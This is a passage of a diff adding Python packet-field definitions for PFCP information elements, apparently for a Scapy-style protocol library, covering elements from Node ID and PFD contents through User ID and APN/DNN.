+ ] + + +class IE_NodeId(IE_Base): + name = "IE Node ID" + ie_type = 60 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitEnumField("id_type", "IPv4", 4, NodeIdType), + ConditionalField(IPField("ipv4", 0), + lambda x: x.id_type == 0), + ConditionalField(IP6Field("ipv6", 0), + lambda x: x.id_type == 1), + ConditionalField( + APNStrLenField("id", "", length_from=lambda x: x.length - 1), + lambda x: x.id_type == 2), + ExtraDataField("extra_data"), + ] + + +class IE_PFDContents(IE_Base): + name = "IE PFD contents" + ie_type = 61 + fields_desc = IE_Base.fields_desc + [ + BitField("ADNP", 0, 1), + BitField("AURL", 0, 1), + BitField("AFD", 0, 1), + BitField("DNP", 0, 1), + BitField("CP", 0, 1), + BitField("DN", 0, 1), + BitField("URL", 0, 1), + BitField("FD", 0, 1), + ByteField("spare_2", 0), + ConditionalField(FieldLenField("flow_length", None, length_of="flow"), + lambda pkt: pkt.FD == 1), + ConditionalField(StrLenField("flow", "", + length_from=lambda pkt: pkt.flow_length), + lambda pkt: pkt.FD == 1), + ConditionalField(FieldLenField("url_length", None, length_of="url"), + lambda pkt: pkt.URL == 1), + ConditionalField(StrLenField("url", "", + length_from=lambda pkt: pkt.url_length), + lambda pkt: pkt.URL == 1), + ConditionalField(FieldLenField("domain_length", None, + length_of="domain"), + lambda pkt: pkt.DN == 1), + ConditionalField( + StrLenField("domain", "", + length_from=lambda pkt: pkt.domain_length), + lambda pkt: pkt.DN == 1), + ConditionalField(FieldLenField("custom_length", None, + length_of="custom"), + lambda pkt: pkt.CP == 1), + ConditionalField( + StrLenField("custom", "", + length_from=lambda pkt: pkt.custom_length), + lambda pkt: pkt.CP == 1), + ConditionalField(FieldLenField("dnp_length", None, length_of="dnp"), + lambda pkt: pkt.DNP == 1), + ConditionalField(StrLenField("dnp", "", + length_from=lambda pkt: pkt.dnp_length), + lambda pkt: pkt.DNP == 1), + ConditionalField(FieldLenField("additional_flow_length", None, + length_of="additional_flow"), + lambda pkt: pkt.AFD == 1), + ConditionalField( + StrLenField("additional_flow", "", + length_from=lambda pkt: pkt.additional_flow_length), + lambda pkt: pkt.AFD == 1), + ConditionalField(FieldLenField("additional_url_length", None, + length_of="additional_url"), + lambda pkt: pkt.AURL == 1), + ConditionalField( + StrLenField("additional_url", "", + length_from=lambda pkt: pkt.additional_url_length), + lambda pkt: pkt.AURL == 1), + ConditionalField( + FieldLenField("additional_dn_dnp_length", None, + length_of="additional_dn_dnp"), + lambda pkt: pkt.ADNP == 1), + ConditionalField( + StrLenField("additional_dn_dnp", "", + length_from=lambda pkt: pkt.additional_dn_dnp_length), + lambda pkt: pkt.ADNP == 1), + ExtraDataField("extra_data"), + ] + + +class IE_MeasurementMethod(IE_Base): + name = "IE Measurement Method" + ie_type = 62 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitField("EVENT", 0, 1), + BitField("VOLUM", 0, 1), + BitField("DURAT", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_UsageReportTrigger(IE_Base): + name = "IE Usage Report Trigger" + ie_type = 63 + fields_desc = IE_Base.fields_desc + [ + BitField("IMMER", 0, 1), + BitField("DROTH", 0, 1), + BitField("STOPT", 0, 1), + BitField("START", 0, 1), + BitField("QUHTI", 0, 1), + BitField("TIMTH", 0, 1), + BitField("VOLTH", 0, 1), + BitField("PERIO", 0, 1), + BitField("EVETH", 0, 1), + BitField("MACAR", 0, 1), + BitField("ENVCL", 0, 1), + BitField("MONIT", 0, 1), + BitField("TERMR", 0, 1), + BitField("LIUSA", 0, 1), + BitField("TIMQU", 0, 1), + BitField("VOLQU", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_MeasurementPeriod(IE_Base): + name = "IE Measurement Period" + ie_type = 64 + fields_desc = IE_Base.fields_desc + [ + IntField("period", 0), + ExtraDataField("extra_data"), + ] + + +class IE_FqCSID(IE_Base): + name = "IE FQ-CSID" + ie_type = 65 + fields_desc = IE_Base.fields_desc + [ + BitEnumField("node_id_type", "IPv4", 4, FqCSIDNodeIdType), + BitFieldLenField("num_csids", None, 4, count_of="csids"), + ConditionalField(IPField("ipv4", 0), + lambda x: x.node_id_type == 0), + ConditionalField(IP6Field("ipv6", 0), + lambda x: x.node_id_type == 1), + ConditionalField( + # FIXME: split (value = mcc * 1000 + mnc) + BitField("mcc_mnc", 0, 20), + lambda x: x.node_id_type == 2), + # "Least significant 12 bits is a 12 bit integer assigned by + # an operator to an MME, SGW-C, SGW-U, PGW-C or PGW-U." + ConditionalField( + BitField("extra_id", 0, 12), + lambda x: x.node_id_type == 2), + FieldListField("csids", None, ShortField("csid", 0), + count_from=lambda x: x.num_csids), + ExtraDataField("extra_data"), + ] + + +class IE_VolumeMeasurement(IE_Base): + name = "IE Volume Measurement" + ie_type = 66 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitField("DLVOL", 0, 1), + BitField("ULVOL", 0, 1), + BitField("TOVOL", 0, 1), + ConditionalField(XLongField("total", 0), lambda x: x.TOVOL == 1), + ConditionalField(XLongField("uplink", 0), lambda x: x.ULVOL == 1), + ConditionalField(XLongField("downlink", 0), lambda x: x.DLVOL == 1), + ExtraDataField("extra_data"), + ] + + +class IE_DurationMeasurement(IE_Base): + name = "IE Duration Measurement" + ie_type = 67 + fields_desc = IE_Base.fields_desc + [ + IntField("duration", 0), + ExtraDataField("extra_data"), + ] + + +class IE_TimeOfFirstPacket(IE_Base): + name = "IE Time of First Packet" + ie_type = 69 + fields_desc = IE_Base.fields_desc + [ + IntField("timestamp", 0), + ExtraDataField("extra_data"), + ] + + +class IE_TimeOfLastPacket(IE_Base): + name = "IE Time of Last Packet" + ie_type = 70 + fields_desc = IE_Base.fields_desc + [ + IntField("timestamp", 0), + ExtraDataField("extra_data"), + ] + + +class IE_QuotaHoldingTime(IE_Base): + name = "IE Quota Holding Time" + ie_type = 71 + fields_desc = IE_Base.fields_desc + [ + IntField("time_value", 0), + ExtraDataField("extra_data"), + ] + + +class IE_DroppedDLTrafficThreshold(IE_Base): + name = "IE Dropped DL Traffic Threshold" + ie_type = 72 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 6), + BitField("DLBY", 0, 1), + BitField("DLPA", 0, 1), + ConditionalField(LongField("packet_count", 0), + lambda x: x.DLPA == 1), + ConditionalField(LongField("byte_count", 0), + lambda x: x.DLBY == 1), + ExtraDataField("extra_data"), + ] + + +class IE_VolumeQuota(IE_Base): + name = "IE Volume Quota" + ie_type = 73 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitField("DLVOL", 0, 1), + BitField("ULVOL", 0, 1), + BitField("TOVOL", 0, 1), + ConditionalField(XLongField("total", 0), lambda x: x.TOVOL == 1), + ConditionalField(XLongField("uplink", 0), lambda x: x.ULVOL == 1), + ConditionalField(XLongField("downlink", 0), lambda x: x.DLVOL == 1), + ExtraDataField("extra_data"), + ] + + +class IE_TimeQuota(IE_Base): + name = "IE Time Quota" + ie_type = 74 + fields_desc = IE_Base.fields_desc + [ + IntField("quota", 0), + ExtraDataField("extra_data"), + ] + + +class IE_StartTime(IE_Base): + name = "IE Start Time" + ie_type = 75 + fields_desc = IE_Base.fields_desc + [ + IntField("timestamp", 0), + ExtraDataField("extra_data"), + ] + + +class IE_EndTime(IE_Base): + name = "IE End Time" + ie_type = 76 + fields_desc = IE_Base.fields_desc + [ + IntField("timestamp", 0), + ExtraDataField("extra_data"), + ] + + +class IE_URR_Id(IE_Base): + name = "IE URR ID" + ie_type = 81 + fields_desc = IE_Base.fields_desc + [ + IntField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_LinkedURR_Id(IE_Base): + name = "IE Linked URR ID" + ie_type = 82 + fields_desc = IE_Base.fields_desc + [ + IntField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_OuterHeaderCreation(IE_Base): + name = "IE Outer Header Creation" + ie_type = 84 + fields_desc = IE_Base.fields_desc + [ + BitField("STAG", 0, 1), + BitField("CTAG", 0, 1), + BitField("IPV6", 0, 1), + BitField("IPV4", 0, 1), + BitField("UDPIPV6", 0, 1), + BitField("UDPIPV4", 0, 1), + BitField("GTPUUDPIPV6", 0, 1), + BitField("GTPUUDPIPV4", 0, 1), + ByteField("spare", 0), + ConditionalField(XIntField("TEID", 0), + lambda x: x.GTPUUDPIPV4 == 1 or x.GTPUUDPIPV6 == 1), + ConditionalField(IPField("ipv4", 0), + lambda x: + x.IPV4 == 1 or x.UDPIPV4 == 1 or x.GTPUUDPIPV4 == 1), + ConditionalField(IP6Field("ipv6", 0), + lambda x: + x.IPV6 == 1 or x.UDPIPV6 == 1 or x.GTPUUDPIPV6 == 1), + ConditionalField(ShortField("port", 0), + lambda x: x.UDPIPV4 == 1 or x.UDPIPV6 == 1), + ConditionalField(ThreeBytesField("ctag", 0), + lambda x: x.CTAG == 1), + ConditionalField(ThreeBytesField("stag", 0), + lambda x: x.STAG == 1), + ExtraDataField("extra_data"), + ] + + +class IE_BAR_Id(IE_Base): + name = "IE BAR ID" + ie_type = 88 + fields_desc = IE_Base.fields_desc + [ + ByteField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_CPFunctionFeatures(IE_Base): + name = "IE CP Function Features" + ie_type = 89 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 6), + BitField("OVRL", 0, 1), + BitField("LOAD", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_UsageInformation(IE_Base): + name = "IE Usage Information" + ie_type = 90 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitField("UBE", 0, 1), + BitField("UAE", 0, 1), + BitField("AFT", 0, 1), + BitField("BEF", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_ApplicationInstanceId(IE_Base): + name = "IE Application Instance ID" + ie_type = 91 + fields_desc = IE_Base.fields_desc + [ + StrLenField("id", "", length_from=lambda x: x.length) + ] + + +class IE_FlowInformation(IE_Base): + name = "IE Flow Information" + ie_type = 92 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitEnumField("direction", "Unspecified", 3, FlowDirection), + FieldLenField("flow_length", None, length_of="flow"), + StrLenField("flow", "", length_from=lambda x: x.flow_length), + ExtraDataField("extra_data"), + ] + + +class IE_UE_IP_Address(IE_Base): + name = "IE UE IP Address" + ie_type = 93 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitField("SD", 0, 1), # source or dest + BitField("V4", 0, 1), + BitField("V6", 0, 1), + ConditionalField(IPField("ipv4", 0), lambda x: x.V4 == 1), + ConditionalField(IP6Field("ipv6", 0), lambda x: x.V6 == 1), + ExtraDataField("extra_data"), + ] + + +class IE_PacketRate(IE_Base): + name = "IE Packet Rate" + ie_type = 94 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare_1", 0, 6), + BitField("DLPR", 0, 1), + BitField("ULPR", 0, 1), + ConditionalField(BitField("spare_2", 0, 5), lambda x: x.ULPR == 1), + ConditionalField(BitEnumField("ul_time_unit", "minute", 3, TimeUnit), + lambda x: x.ULPR == 1), + ConditionalField(ShortField("ul_max_packet_rate", 0), + lambda x: x.ULPR == 1), + ConditionalField(BitField("spare_3", 0, 5), lambda x: x.DLPR == 1), + ConditionalField(BitEnumField("dl_time_unit", "minute", 3, TimeUnit), + lambda x: x.DLPR == 1), + ConditionalField(ShortField("dl_max_packet_rate", 0), + lambda x: x.DLPR == 1), + ExtraDataField("extra_data"), + ] + + +class IE_OuterHeaderRemoval(IE_Base): + name = "IE Outer Header Removal" + ie_type = 95 + fields_desc = IE_Base.fields_desc + [ + ByteEnumField("header", None, OuterHeaderRemovalDescription), + ConditionalField(XBitField("spare", None, 7), + lambda x: x.length is not None and x.length > 1), + ConditionalField(BitField("pdu_session_container", None, 1), + lambda x: x.length is not None and x.length > 1), + ExtraDataField("extra_data"), + ] + + +class IE_RecoveryTimeStamp(IE_Base): + name = "IE Recovery Time Stamp" + ie_type = 96 + default_length = 4 + fields_desc = IE_Base.fields_desc + [ + IntField("timestamp", 0), + ExtraDataField("extra_data"), + ] + + +class IE_DLFlowLevelMarking(IE_Base): + name = "IE DL Flow Level Marking" + ie_type = 97 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare_1", 0, 6), + BitField("SCI", 0, 1), + BitField("TTC", 0, 1), + ConditionalField(ByteField("traffic_class", 0), lambda x: x.TTC), + ConditionalField(ByteField("traffic_class_mask", 0), lambda x: x.TTC), + ConditionalField(ByteField("service_class_indicator", 0), + lambda x: x.SCI), + ConditionalField(ByteField("spare_2", 0), lambda x: x.SCI), + ExtraDataField("extra_data"), + ] + + +class IE_HeaderEnrichment(IE_Base): + name = "IE Header Enrichment" + ie_type = 98 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 3), + BitEnumField("header_type", "HTTP", 5, HeaderType), + FieldLenField("name_length", None, fmt="B", length_of="name"), + StrLenField("name", "", length_from=lambda x: x.name_length), + FieldLenField("value_length", None, fmt="B", length_of="value"), + StrLenField("value", "", length_from=lambda x: x.value_length), + ExtraDataField("extra_data"), + ] + + +class IE_MeasurementInformation(IE_Base): + name = "IE Measurement Information" + ie_type = 100 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 3), + BitField("MNOP", 0, 1), + BitField("ISTM", 0, 1), + BitField("RADI", 0, 1), + BitField("INAM", 0, 1), + BitField("MBQE", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_NodeReportType(IE_Base): + name = "IE Node Report Type" + ie_type = 101 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 7), + BitField("UPFR", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_RemoteGTP_U_Peer(IE_Base): + name = "IE Remote GTP-U Peer" + ie_type = 103 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare_1", 0, 4), + BitField("NI", 0, 1), + BitField("DI", 0, 1), + BitField("V4", 0, 1), + BitField("V6", 0, 1), + ConditionalField(IPField("ipv4", 0), lambda x: x.V4 == 1), + ConditionalField(IP6Field("ipv6", 0), lambda x: x.V6 == 1), + ConditionalField(ByteField("dest_interface_length", 1), + lambda x: x.DI == 1), + ConditionalField(XBitField("spare_2", 0, 4), lambda x: x.DI == 1), + ConditionalField( + BitEnumField("dest_interface", "Access", 4, DestinationInterface), + lambda x: x.DI == 1), + ConditionalField( + FieldLenField("network_instance_length", 1, + length_of="network_instance"), + lambda x: x.NI == 1), + ConditionalField( + APNStrLenField("network_instance", "", + length_from=lambda x: x.network_instance_length), + lambda x: x.NI == 1), + ExtraDataField("extra_data"), + ] + + +class IE_UR_SEQN(IE_Base): + name = "IE UR-SEQN" + ie_type = 104 + fields_desc = IE_Base.fields_desc + [ + IntField("number", 0), + ] + + +class IE_ActivatePredefinedRules(IE_Base): + name = "IE Activate Predefined Rules" + ie_type = 106 + fields_desc = IE_Base.fields_desc + [ + StrLenField("name", "", length_from=lambda x: x.length) + ] + + +class IE_DeactivatePredefinedRules(IE_Base): + name = "IE Deactivate Predefined Rules" + ie_type = 107 + fields_desc = IE_Base.fields_desc + [ + StrLenField("name", "", length_from=lambda x: x.length) + ] + + +class IE_FAR_Id(IE_Base): + name = "IE FAR ID" + ie_type = 108 + fields_desc = IE_Base.fields_desc + [ + IntField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_QER_Id(IE_Base): + name = "IE QER ID" + ie_type = 109 + fields_desc = IE_Base.fields_desc + [ + IntField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_OCIFlags(IE_Base): + name = "IE OCI Flags" + ie_type = 110 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", None, 7), + BitField("AOCI", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_PFCPAssociationReleaseRequest(IE_Base): + name = "IE PFCP Association Release Request" + ie_type = 111 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", None, 7), + BitField("SARR", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_GracefulReleasePeriod(IE_Base): + name = "IE Graceful Release Period" + ie_type = 112 + fields_desc = IE_Base.fields_desc + [ + BitEnumField("release_timer_unit", "2 seconds", 3, TimerUnit), + BitField("release_timer_value", 0, 5), + ExtraDataField("extra_data"), + ] + + +class IE_PDNType(IE_Base): + name = "IE PDN Type" + ie_type = 113 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitEnumField("pdn_type", "IPv4", 3, PDNType), + ExtraDataField("extra_data"), + ] + + +class IE_FailedRuleId(IE_Base): + name = "IE Failed Rule ID" + ie_type = 114 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 3), + BitEnumField("type", "PDR", 5, RuleIDType), + ConditionalField(ShortField("pdr_id", 0), + lambda x: x.type == 0), + ConditionalField(IntField("far_id", 0), + lambda x: x.type == 1 or x.type > 4), + ConditionalField(IntField("qer_id", 0), lambda x: x.type == 2), + ConditionalField(IntField("urr_id", 0), lambda x: x.type == 3), + ConditionalField(ByteField("bar_id", 0), + lambda x: x.type == 4), + ExtraDataField("extra_data"), + ] + + +class IE_TimeQuotaMechanism(IE_Base): + name = "IE Time Quota Mechanism" + ie_type = 115 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 6), + BitEnumField("base_time_interval_type", "CTP", 2, BaseTimeInterval), + IntField("interval", 0), + ExtraDataField("extra_data"), + ] + + +class IE_UserPlaneIPResourceInformation(IE_Base): + name = "IE User Plane IP Resource Information" + ie_type = 116 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 1), + BitField("ASSOSI", 0, 1), + BitField("ASSONI", 0, 1), + BitField("TEIDRI", 0, 3), + BitField("V6", 0, 1), + BitField("V4", 0, 1), + ConditionalField(XByteField("teid_range", 0), lambda x: x.TEIDRI != 0), + ConditionalField(IPField("ipv4", 0), lambda x: x.V4 == 1), + ConditionalField(IP6Field("ipv6", 0), + lambda x: x.V6 == 1), + ConditionalField( + APNStrLenField("network_instance", "", + length_from=lambda x: + x.length - 1 - (1 if x.TEIDRI != 0 else 0) - + (x.V4 * 4) - (x.V6 * 16) - x.ASSOSI), + lambda x: x.ASSONI == 1), + ConditionalField(XBitField("spare", None, 4), lambda x: x.ASSOSI == 1), + ConditionalField( + BitEnumField("interface", "Access", 4, SourceInterface), + lambda x: x.ASSOSI == 1), + ExtraDataField("extra_data"), + ] + + +class IE_UserPlaneInactivityTimer(IE_Base): + name = "IE User Plane Inactivity Timer" + ie_type = 117 + fields_desc = IE_Base.fields_desc + [ + IntField("timer", 0), + ExtraDataField("extra_data"), + ] + + +class IE_Multiplier(IE_Base): + name = "IE Multiplier" + ie_type = 119 + fields_desc = IE_Base.fields_desc + [ + SignedLongField("digits", 0), + SignedIntField("exponent", 0), + ] + + +class IE_AggregatedURR_Id(IE_Base): + name = "IE Aggregated URR ID" + ie_type = 120 + fields_desc = IE_Base.fields_desc + [ + IntField("id", 0), + ] + + +class IE_SubsequentVolumeQuota(IE_Base): + name = "IE Subsequent Volume Quota" + ie_type = 121 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitField("DLVOL", 0, 1), + BitField("ULVOL", 0, 1), + BitField("TOVOL", 0, 1), + ConditionalField(XLongField("total", 0), lambda x: x.TOVOL == 1), + ConditionalField(XLongField("uplink", 0), lambda x: x.ULVOL == 1), + ConditionalField(XLongField("downlink", 0), lambda x: x.DLVOL == 1), + ExtraDataField("extra_data"), + ] + + +class IE_SubsequentTimeQuota(IE_Base): + name = "IE Subsequent Time Quota" + ie_type = 122 + fields_desc = IE_Base.fields_desc + [ + IntField("quota", 0), + ExtraDataField("extra_data"), + ] + + +class IE_RQI(IE_Base): + name = "IE RQI" + ie_type = 123 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", None, 7), + BitField("RQI", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_QFI(IE_Base): + name = "IE QFI" + ie_type = 124 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", None, 2), + BitField("QFI", 0, 6), + ExtraDataField("extra_data"), + ] + + +class IE_QueryURRReference(IE_Base): + name = "IE Query URR Reference" + ie_type = 125 + fields_desc = IE_Base.fields_desc + [ + IntField("reference", 0), + ExtraDataField("extra_data"), + ] + + +class IE_AdditionalUsageReportsInformation(IE_Base): + name = "IE Additional Usage Reports Information" + ie_type = 126 + fields_desc = IE_Base.fields_desc + [ + BitField("AURI", 0, 1), + BitField("reports", 0, 15), + ExtraDataField("extra_data"), + ] + + +class IE_TrafficEndpointId(IE_Base): + name = "IE Traffic Endpoint ID" + ie_type = 131 + fields_desc = IE_Base.fields_desc + [ + ByteField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_MACAddress(IE_Base): + name = "IE MAC Address" + ie_type = 133 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitField("UDES", 0, 1), + BitField("USOU", 0, 1), + BitField("DEST", 0, 1), + BitField("SOUR", 0, 1), + ConditionalField(MACField("source_mac", 0), + lambda x: x.SOUR == 1), + ConditionalField(MACField("destination_mac", 0), + lambda x: x.DEST == 1), + ConditionalField(MACField("upper_source_mac", 0), + lambda x: x.USOU == 1), + ConditionalField(MACField("upper_destination_mac", 0), + lambda x: x.UDES == 1), + ExtraDataField("extra_data"), + ] + + +class IE_C_TAG(IE_Base): + name = "IE C-TAG" + ie_type = 134 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare_1", 0, 5), + BitField("VID", 0, 1), + BitField("DEI", 0, 1), + BitField("PCP", 0, 1), + # TODO: fix cvid_value + ConditionalField( + BitField("cvid_value_hi", 0, 4), lambda x: x.VID == 1), + ConditionalField(BitField("spare_2", 0, 4), lambda x: x.VID == 0), + ConditionalField(BitField("dei_flag", 0, 1), lambda x: x.DEI == 1), + ConditionalField(BitField("spare_3", 0, 1), lambda x: x.DEI == 0), + ConditionalField(BitField("pcp_value", 0, 3), lambda x: x.PCP == 1), + ConditionalField(BitField("spare_4", 0, 3), lambda x: x.PCP == 0), + ConditionalField(ByteField("cvid_value_low", 0), + lambda x: x.VID == 1), + ConditionalField(ByteField("spare_5", 0), lambda x: x.VID == 0), + ExtraDataField("extra_data"), + ] + + +class IE_S_TAG(IE_Base): + name = "IE S-TAG" + ie_type = 135 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare_1", 0, 5), + BitField("VID", 0, 1), + BitField("DEI", 0, 1), + BitField("PCP", 0, 1), + # TODO: fix svid_value + ConditionalField(BitField("svid_value_hi", 0, 4), + lambda x: x.VID == 1), + ConditionalField(BitField("spare_2", 0, 4), lambda x: x.VID == 0), + ConditionalField(BitField("dei_flag", 0, 1), lambda x: x.DEI == 1), + ConditionalField(BitField("spare_3", 0, 1), lambda x: x.DEI == 0), + ConditionalField(BitField("pcp_value", 0, 3), lambda x: x.PCP == 1), + ConditionalField(BitField("spare_4", 0, 3), lambda x: x.PCP == 0), + ConditionalField(ByteField("svid_value_low", 0), + lambda x: x.VID == 1), + ConditionalField(ByteField("spare_5", 0), lambda x: x.VID == 0), + ExtraDataField("extra_data"), + ] + + +class IE_Ethertype(IE_Base): + name = "IE Ethertype" + ie_type = 136 + fields_desc = IE_Base.fields_desc + [ + ShortField("type", 0), + ExtraDataField("extra_data"), + ] + + +class IE_Proxying(IE_Base): + name = "IE Proxying" + ie_type = 137 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 6), + BitField("INS", 0, 1), + BitField("ARP", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_EthernetFilterId(IE_Base): + name = "IE Ethernet Filter ID" + ie_type = 138 + fields_desc = IE_Base.fields_desc + [ + IntField("id", 0), + ExtraDataField("extra_data"), + ] + + +class IE_EthernetFilterProperties(IE_Base): + name = "IE Ethernet Filter Properties" + ie_type = 139 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 7), + BitField("BIDE", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_SuggestedBufferingPacketsCount(IE_Base): + name = "IE Suggested Buffering Packets Count" + ie_type = 140 + fields_desc = IE_Base.fields_desc + [ + ByteField("count", 0), + ExtraDataField("extra_data"), + ] + + +class IE_UserId(IE_Base): + name = "IE User ID" + ie_type = 141 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 4), + BitField("NAIF", 0, 1), + BitField("MSISDNF", 0, 1), + BitField("IMEIF", 0, 1), + BitField("IMSIF", 0, 1), + ConditionalField( + FieldLenField("imsi_length", None, length_of="imsi", fmt="B"), + lambda x: x.IMSIF == 1), + ConditionalField( + StrLenField("imsi", "", length_from=lambda x: x.imsi_length), + lambda x: x.IMSIF == 1), + ConditionalField( + FieldLenField("imei_length", None, length_of="imei", fmt="B"), + lambda x: x.IMEIF == 1), + ConditionalField( + StrLenField("imei", "", length_from=lambda x: x.imei_length), + lambda x: x.IMEIF == 1), + ConditionalField( + FieldLenField("msisdn_length", None, length_of="msisdn", fmt="B"), + lambda x: x.MSISDNF == 1), + ConditionalField( + StrLenField("msisdn", "", length_from=lambda x: x.msisdn_length), + lambda x: x.MSISDNF == 1), + ConditionalField( + FieldLenField("nai_length", None, length_of="nai", fmt="B"), + lambda x: x.NAIF == 1), + ConditionalField( + StrLenField("nai", "", length_from=lambda x: x.nai_length), + lambda x: x.NAIF == 1), + ExtraDataField("extra_data"), + ] + + +class IE_EthernetPDUSessionInformation(IE_Base): + name = "IE Ethernet PDU Session Information" + ie_type = 142 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 7), + BitField("ETHI", 0, 1), + ExtraDataField("extra_data"), + ] + + +class IE_MACAddressesDetected(IE_Base): + name = "IE MAC Addresses Detected" + ie_type = 144 + fields_desc = IE_Base.fields_desc + [ + FieldLenField("num_macs", None, count_of="macs", fmt="B"), + FieldListField("macs", None, MACField("mac", 0), + count_from=lambda x: x.num_macs), + ExtraDataField("extra_data"), + ] + + +class IE_MACAddressesRemoved(IE_Base): + name = "IE MAC Addresses Removed" + ie_type = 145 + fields_desc = IE_Base.fields_desc + [ + FieldLenField("num_macs", None, count_of="macs", fmt="B"), + FieldListField("macs", None, MACField("mac", 0), + count_from=lambda x: x.num_macs), + ExtraDataField("extra_data"), + ] + + +class IE_EthernetInactivityTimer(IE_Base): + name = "IE Ethernet Inactivity Timer" + ie_type = 146 + fields_desc = IE_Base.fields_desc + [ + IntField("timer", 0), + ExtraDataField("extra_data"), + ] + + +class IE_EventQuota(IE_Base): + name = "IE Event Quota" + ie_type = 148 + fields_desc = IE_Base.fields_desc + [ + IntField("event_quota", 0), + ExtraDataField("extra_data"), + ] + + +class IE_EventThreshold(IE_Base): + name = "IE Event Threshold" + ie_type = 149 + fields_desc = IE_Base.fields_desc + [ + IntField("event_threshold", 0), + ExtraDataField("extra_data"), + ] + + +class IE_SubsequentEventQuota(IE_Base): + name = "IE Subsequent Event Quota" + ie_type = 150 + fields_desc = IE_Base.fields_desc + [ + IntField("subsequent_event_quota", 0), + ExtraDataField("extra_data"), + ] + + +class IE_SubsequentEventThreshold(IE_Base): + name = "IE Subsequent Event Threshold" + ie_type = 151 + fields_desc = IE_Base.fields_desc + [ + IntField("subsequent_event_threshold", 0), + ExtraDataField("extra_data"), + ] + + +class IE_TraceInformation(IE_Base): + # TODO: more detailed decoding + # TODO: fix IP address handling + name = "IE Trace Information" + ie_type = 152 + fields_desc = IE_Base.fields_desc + [ + BitField("mcc_digit_2", 0, 4), + BitField("mcc_digit_1", 0, 4), + BitField("mnc_digit_3", 0, 4), + BitField("mcc_digit_3", 0, 4), + BitField("mnc_digit_2", 0, 4), + BitField("mnc_digit_1", 0, 4), + ThreeBytesField("trace_id", 0), # FIXME + FieldLenField("triggering_events_length", None, + length_of="triggering_events", fmt="B"), + StrLenField("triggering_events", "", + length_from=lambda x: x.triggering_events_length), + ByteField("session_trace_depth", 0), + FieldLenField("list_of_interfaces_length", None, + length_of="list_of_interfaces", fmt="B"), + StrLenField("list_of_interfaces", "", + length_from=lambda x: x.list_of_interfaces_length), + FieldLenField("ip_address_length", None, + length_of="ip_address", fmt="B"), + StrLenField("ip_address", "", + length_from=lambda x: x.ip_address_length), + ExtraDataField("extra_data"), + ] + + +class IE_FramedRoute(IE_Base): + name = "IE Framed-Route" + ie_type = 153 + fields_desc = IE_Base.fields_desc + [ + StrLenField("framed_route", "", length_from=lambda x: x.length) + ] + + +class IE_FramedRouting(IE_Base): + name = "IE Framed-Routing" + ie_type = 154 + fields_desc = IE_Base.fields_desc + [ + StrLenField("framed_routing", "", length_from=lambda x: x.length) + ] + + +class IE_FramedIPv6Route(IE_Base): + name = "IE Framed-IPv6-Route" + ie_type = 155 + fields_desc = IE_Base.fields_desc + [ + StrLenField("framed_ipv6_route", "", length_from=lambda x: x.length) + ] + + +class IE_EventTimeStamp(IE_Base): + name = "IE Event Time Stamp" + ie_type = 156 + fields_desc = IE_Base.fields_desc + [ + IntField("timestamp", 0), + ExtraDataField("extra_data"), + ] + + +class IE_AveragingWindow(IE_Base): + name = "IE Averaging Window" + ie_type = 157 + fields_desc = IE_Base.fields_desc + [ + IntField("averaging_window", 0), + ExtraDataField("extra_data"), + ] + + +class IE_PagingPolicyIndicator(IE_Base): + name = "IE Paging Policy Indicator" + ie_type = 158 + fields_desc = IE_Base.fields_desc + [ + XBitField("spare", 0, 5), + BitField("ppi", 0, 3), + ExtraDataField("extra_data"), + ] + + +class IE_APN_DNN(IE_Base): + name = "IE APN/DNN" + ie_type = 159 + fields_desc = IE_Base.fields_desc + [ + APNStrLenField("apn_dnn", "", length_from=lambda x: x.length) + ] + + +class IE_3GPP_InterfaceType(IE_Base): + name = "IE 3GPP Interface Type" + ie_type = 160 + fields_desc = 